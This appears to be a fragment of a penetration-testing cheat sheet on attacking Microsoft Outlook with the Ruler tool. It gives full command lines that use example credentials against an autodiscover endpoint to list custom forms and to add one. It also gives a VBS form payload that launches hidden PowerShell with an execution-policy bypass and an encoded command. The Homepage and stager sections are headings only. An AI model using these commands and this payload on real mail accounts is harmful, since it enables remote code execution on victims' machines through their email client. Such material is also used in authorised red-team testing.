Outlook

Ruler

Rules

Forms

Display forms:

$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display

Exploit:

$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send

vbs-payload.txt:

CreateObject("WScript.Shell").Run "powershell -exec bypass -enc <BASE64_CMD>", 0, false

Clean up:

Empire stager encryption:

Homepage

Exploit:

homepage.html:

Clean up:

Stager encryption is the same as for Ruler/Forms.
